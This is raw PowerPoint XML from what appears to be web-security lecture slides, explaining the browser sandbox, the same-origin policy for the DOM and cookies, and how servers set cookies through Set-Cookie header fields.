                <a:ext cx="531000" cy="9468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1C55CD0F-0BF2-2747-BC22-58399BF3A691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070577" y="2961874"/>
                  <a:ext cx="566640" cy="1303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9626970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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA4FF8E-4F7E-8B48-A874-17009771C6C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ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Browser Sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49154" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1A69D6-C458-F542-A069-36C82769BC44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066800" y="2103120"/>
            <a:ext cx="9231314" cy="4112286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>safely execute JavaScript code provided by a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>No direct file access, limited access to OS, network, browser data, content that came from other websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>How? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Same origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Can only access properties of documents and windows from the same domain, protocol, and port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>User can grant privileges to signed scripts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>UniversalBrowserRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/Write, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>UniversalFileRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>UniversalSendMail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="Picture 6" descr="MCj02979090000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD2A62FA-4B63-8947-B7D1-CDF2CF28E6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8052" y="923043"/>
            <a:ext cx="2819400" cy="119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156" name="Picture 7" descr="server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDBEDA6-9AA6-C242-8E07-F459FBF12A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3566" y="288042"/>
            <a:ext cx="1284287" cy="185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B9C394F-A2DE-484D-AB1A-B69443DA6922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908587" y="4695345"/>
            <a:ext cx="3788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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>… don’t, unless you really know what you’re doing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8E66ADF-B5EE-8446-B4A2-333F02E0FBB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7614977" y="4983994"/>
            <a:ext cx="649440" cy="256320"/>
            <a:chOff x="7614977" y="4983994"/>
            <a:chExt cx="649440" cy="25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32301C29-FEFB-884E-87B3-D50F4AA8D960}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7614977" y="4983994"/>
                <a:ext cx="649440" cy="17676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32301C29-FEFB-884E-87B3-D50F4AA8D960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605977" y="4975354"/>
                  <a:ext cx="66708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4A904CAF-A8E2-1247-8A5C-FC386F4752D4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7653497" y="5147434"/>
                <a:ext cx="182880" cy="9288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4A904CAF-A8E2-1247-8A5C-FC386F4752D4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644857" y="5138434"/>
                  <a:ext cx="200520" cy="1105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567247547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BC84D5-801E-4F49-9376-5BD197229A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Same Origin Policy for DOM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3F1AF5-EBF8-7642-80AC-92D2A5134F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50571" y="2217420"/>
            <a:ext cx="8158843" cy="1211580"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FF7E79"/>
          </a:solidFill>
          <a:ln w="38100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3200" dirty="0"/>
              <a:t>Origin A can access origin B’s DOM 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en-US" sz="3200" dirty="0"/>
              <a:t>if A and B have same (protocol, domain, port)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A29ACC-103A-1242-BBB4-A2CDF712E5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99214" y="3632226"/>
            <a:ext cx="5410200" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>protocol://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>domain:port</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>path?params</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" i="1" dirty="0">
              <a:latin typeface="+mn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E30AD7-3586-3F4F-9D72-00884CDA271A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866900" y="4653642"/>
            <a:ext cx="47035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SOP for cookies is a little different…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23299461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Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B416FC9-6096-8345-B2D4-AA9DF28B0C6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Setting Cookies by Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51202" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DBD836A-75E9-8445-B1C4-071776945D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829937"/>
            <a:ext cx="8839200" cy="3622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883735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7" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC43044-E5E3-374F-9FDC-F17EBACD2D6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Setting Cookies by Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121858" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9AB0BEC-7092-B245-9AB2-5D5C5FDE5F7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xfrm>
            <a:off x="10261600" y="6356351"/>
            <a:ext cx="2844800" cy="3651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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr kumimoji="1"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indent="-22860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indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buChar char="•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indent="-22860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fld id="{BBFD717B-9AF8-9D4A-931F-C611213D88A4}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill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94051A18-161C-3D4A-9BBA-AE81FFC748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209800"/>
            <a:ext cx="5410200" cy="1219200"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2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/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Let’s look at the cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>set by a typical website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35915983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Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D00E435-D099-9146-9BEB-4A9448B7D94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Setting Cookies by Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8157C86B-08E4-8345-92E6-EA9069E53241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4399873" y="3637061"/>
            <a:ext cx="4300207" cy="685800"/>
            <a:chOff x="4495800" y="3124200"/>
            <a:chExt cx="4300154" cy="68580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5138307-9423-8648-98C7-C7FB37247BFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4495800" y="3124200"/>
              <a:ext cx="3505156" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
                <a:alpha val="30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lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none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07DEE3B-F9C1-D445-9630-E4C7A319AC1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042231" y="3152775"/>
              <a:ext cx="753723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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF3399"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scope</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD702B5-BF8F-E14C-824D-4D6A3BAAB2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47159" y="2345408"/>
            <a:ext cx="1128713" cy="838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19" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C1FBB16-18D6-9748-AB12-0940808C3D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99558" y="2481933"/>
            <a:ext cx="914400" cy="6096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US" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A8D556-CA31-D14E-8E06-6123164D0F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66158" y="3183608"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 1666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21" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF5200B-8FE3-414C-8B09-F719CC1169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66158" y="3412208"/>
            <a:ext cx="1143000" cy="152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22" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3641C9C-7794-5243-A929-DB94186A380D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2490108" y="3178846"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 252"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 252"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 252"/>
              <a:gd name="T5" fmla="*/ 0 h 243"/>
              <a:gd name="T6" fmla="*/ 0 w 252"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T8" fmla="*/ 0 w 252"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 24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52"/>
              <a:gd name="T16" fmla="*/ 0 h 243"/>
              <a:gd name="T17" fmla="*/ 252 w 252"/>
              <a:gd name="T18" fmla="*/ 243 h 24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52" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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23" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715FD7E7-FF1B-3F4B-9002-9B42C53550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81158" y="2269208"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074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US" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D63182A9-7947-DA48-8F7C-98D582C16F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77283" y="2172371"/>
            <a:ext cx="85792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2000" dirty="0"/>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4350E9C6-B16B-2F4A-BE26-A7986EDE08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18758" y="3015334"/>
            <a:ext cx="5638800" cy="2246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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTTP Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Set-cookie:	NAME=VALUE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	domain = (when to send);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	path =     (when to send);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	secure =  (only send over HTTPS);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	expires =  (when expires);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52238" name="Straight Arrow Connector 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{090D41CF-2CA6-204B-BBFA-4C21E3570C5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890158" y="2634333"/>
            <a:ext cx="4191000" cy="15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2239" name="Straight Arrow Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF09AB12-C00B-B140-8265-972B17B1BB36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2875872" y="2949675"/>
            <a:ext cx="4191000" cy="15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7BEDE8BF-D82E-B04E-9C45-B126ECBB9FE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946348" y="4978425"/>
            <a:ext cx="28194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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" kern="0" dirty="0"/>
              <a:t>If NULL, this session only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" kern="0" dirty="0"/>
              <a:t>Delete cookie by setting “expires” to a past date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94E3F0-2F6D-094C-8C56-249A56CD19F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9248105" y="3388637"/>
            <a:ext cx="18770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default scope:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain and path of setting URL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EC6D25C-2A41-A34D-98FA-7FC7CC4AE494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7383137" y="4733074"/>
            <a:ext cx="468000" cy="303120"/>
            <a:chOff x="7383137" y="4733074"/>
            <a:chExt cx="468000" cy="303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F460322A-2218-F044-BE88-396F284C2A28}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7383137" y="4780234"/>
                <a:ext cx="468000" cy="2559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F460322A-2218-F044-BE88-396F284C2A28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374497" y="4771234"/>
                  <a:ext cx="48564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DAD4BF40-BF30-5D43-A8B4-F828E4F95B7C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7387457" y="4733074"/>
                <a:ext cx="232560" cy="633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DAD4BF40-BF30-5D43-A8B4-F828E4F95B7C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378817" y="4724074"/>
                  <a:ext cx="250200" cy="81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C0FA1B11-05FE-A14C-8A73-748CA5297C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8702897" y="3767914"/>
            <a:ext cx="596880" cy="233280"/>
            <a:chOff x="8702897" y="3767914"/>
            <a:chExt cx="596880" cy="233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BEF36E47-720B-8A42-B5DB-C8A3FCEF3913}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8702897" y="3767914"/>
                <a:ext cx="596880" cy="1058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BEF36E47-720B-8A42-B5DB-C8A3FCEF3913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694257" y="3759274"/>
                  <a:ext cx="61452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A3ECB74D-B587-9E45-8765-691452DDFE3E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8719457" y="3883474"/>
                <a:ext cx="101880" cy="1177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A3ECB74D-B587-9E45-8765-691452DDFE3E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710817" y="3874834"/>
                  <a:ext cx="119520" cy="1353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82906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Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E3F4162-F967-6F48-83B5-4143355B85E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286000" y="5148606"/>
            <a:ext cx="7576457" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>both cookies are stored in browser’s storage (“cookie jar”)</a:t>
